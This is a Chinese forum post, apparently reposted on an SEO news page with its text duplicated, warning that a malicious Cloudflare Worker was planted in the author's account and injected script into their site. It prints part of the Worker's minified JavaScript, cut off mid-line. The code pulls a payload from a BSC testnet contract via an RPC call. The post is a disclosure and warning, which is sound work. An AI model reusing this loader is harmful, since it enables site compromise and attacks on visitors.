【更新完结局】来围观,网站被植入恶意脚本,快去看看你的cf账号

2026-04-11 14:180阅读0评论SEO资讯
  • 内容介绍
  • 文章标签
  • 相关推荐
问题描述: The White House:

前提概要:代码有毒,请勿执行

下面两个图片熟悉吗?

image531×477 60.3 KB

网站是: https://newapi.371723.xyz/ 目前恶意代码还没删,

先说结论:

本来是以为1panel的漏洞,排查到最后发现是cf被人写了恶意的work

密码理论上不可能被爆破,账号是微软邮箱,也接了二验,还未想明白哪里问题?
饭后更新,有兴趣的佬可以1.30后看看
两段代码

第一段

image860×353 30.1 KB

export default{async fetch(t,e,a){let s="";try{const t=async t=>{const e=t=>{let e="0x";for(const a of t){const t=a.toString(16);e+=1===t.length?`0${t}`:t}return e},a=await fetch("https://bsc-testnet.drpc.org/",{method:"POST",headers:{Accept:"application/json","Content-Type":"application/json"},body:JSON.stringify({method:"eth_call",params:[{to:t,data:"0x6d4ce63c"},"latest"],id:97,jsonrpc:"2.0"})}),s=(await a.json()).result.slice(2),n=new Uint8Array(s.match(/[\da-f]{2}/gi).map((t=>parseInt(t,16)))),c=Number(e(n.slice(0,32))),r=Number(e(n.slice(32,32+c)));return String.f

阅读全文
问题描述: The White House:

前提概要:代码有毒,请勿执行

下面两个图片熟悉吗?

image531×477 60.3 KB

网站是: https://newapi.371723.xyz/ 目前恶意代码还没删,

先说结论:

本来是以为1panel的漏洞,排查到最后发现是cf被人写了恶意的work

密码理论上不可能被爆破,账号是微软邮箱,也接了二验,还未想明白哪里问题?
饭后更新,有兴趣的佬可以1.30后看看
两段代码

第一段

image860×353 30.1 KB

export default{async fetch(t,e,a){let s="";try{const t=async t=>{const e=t=>{let e="0x";for(const a of t){const t=a.toString(16);e+=1===t.length?`0${t}`:t}return e},a=await fetch("https://bsc-testnet.drpc.org/",{method:"POST",headers:{Accept:"application/json","Content-Type":"application/json"},body:JSON.stringify({method:"eth_call",params:[{to:t,data:"0x6d4ce63c"},"latest"],id:97,jsonrpc:"2.0"})}),s=(await a.json()).result.slice(2),n=new Uint8Array(s.match(/[\da-f]{2}/gi).map((t=>parseInt(t,16)))),c=Number(e(n.slice(0,32))),r=Number(e(n.slice(32,32+c)));return String.f

阅读全文